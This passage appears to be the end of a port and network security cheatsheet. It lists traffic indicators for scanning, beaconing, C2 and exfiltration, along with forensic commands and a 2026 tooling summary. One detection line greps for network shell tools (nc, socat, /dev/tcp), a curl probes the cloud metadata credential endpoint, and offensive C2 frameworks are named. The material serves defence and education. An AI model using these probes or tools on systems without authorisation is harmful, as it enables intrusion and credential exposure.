• Sequential scanning: Ports 1-65535 in order
• Specific vulnerability scans: Only 445, 3389, or exploit-specific
• Non-standard traffic: SSH on 8080, HTTP on 3389
• Unusual protocols: IRC on unexpected ports, P2P traffic from servers
• Beaconing patterns: Regular intervals to external IPs on HTTPS
• DoH/DoT C2: Encrypted DNS tunneling on 443/853
• Data exfiltration indicators: Large outbound transfers on DNS, ICMP
• HTTP/3 abuse: C2 over UDP 443 to blend with legitimate traffic
• Vector DB access: Unusual queries to ports 6333, 19530

Forensic Analysis (2026)

# Check established connections
netstat -antp | grep ESTABLISHED

# Review listening services
lsof -i -P | grep LISTEN

# Check for unusual processes with network connections
ps aux | grep -E "nc|ncat|socat|/dev/tcp"

# Linux: Review iptables/nftables rules
iptables -L -n -v
nft list ruleset

# Windows: Review firewall rules
netsh advfirewall firewall show rule name=all

# Check for port forwards/tunnels
netstat -an | grep LISTEN | grep "127.0.0.1"

# Check for HTTP/3 connections (UDP 443)
ss -u -a | grep :443

# Check for DoT connections (TCP 853)
netstat -antp | grep :853

# Check for WireGuard (UDP 51820)
ss -u -a | grep :51820

# Check IMDSv2 enforcement (AWS)
curl -v http://169.254.169.254/latest/meta-data/ # Should fail

# Docker socket exposure check
ls -la /var/run/docker.sock
netstat -anp | grep 2375

2026 Critical Updates Summary

Protocol Modernization

• HTTP/3 (QUIC): Port 443 now TCP/UDP
• DNS over TLS: Port 853 added
• WireGuard VPN: Port 51820 added
• SMTP: Port 465 reaffirmed (no longer "legacy")

Security Tooling Updates

• NetExec (nxc) replaced CrackMapExec
• Kerbrute for faster Kerberos enumeration
• Sliver/Havoc/Mythic C2 frameworks added

Cloud & Container Updates

• IMDSv2 enforcement (AWS metadata)
• Kubernetes secure ports (10257, 10259) added
• Port 10255 marked as critical if found open

Emerging Threat Vectors

• AI/ML infrastructure (ports 6333, 19530)
• DoH/DoT C2 channels (ports 443, 853)
• HTTP/3 for C2 (UDP 443)
• SMBv1 explicitly marked as legacy vulnerability

Defense Modernization

• JA4 fingerprinting (JA3 obsolete)
• Crowdsec added alongside fail2ban
• Zero Trust architecture emphasis
• Behavioral AI detection for scanning

Legal & Ethical Notice: This cheatsheet is for authorized security testing, defensive operations, and educational purposes only. Unauthorized port scanning, penetration testing, or exploitation is illegal. Always obtain written permission before testing systems you don't own.

2026 Relevance: This cheatsheet reflects the current threat landscape and protocol standards as of 2026, including HTTP/3, DoT, WireGuard, IMDSv2, modern C2 frameworks, and AI infrastructure security considerations.

Usage Tips:

• Bookmark for quick reference during engagements
• Combine with vulnerability databases (CVE, ExploitDB)
• Cross-reference with MITRE ATT&CK techniques
• Update with new services/ports as discovered
• Adapt for specific environments (OT, healthcare, finance)
• Note protocol transport changes (TCP vs UDP vs both)

Maintained: January 2026 - Reflects modern security tooling and emerging threats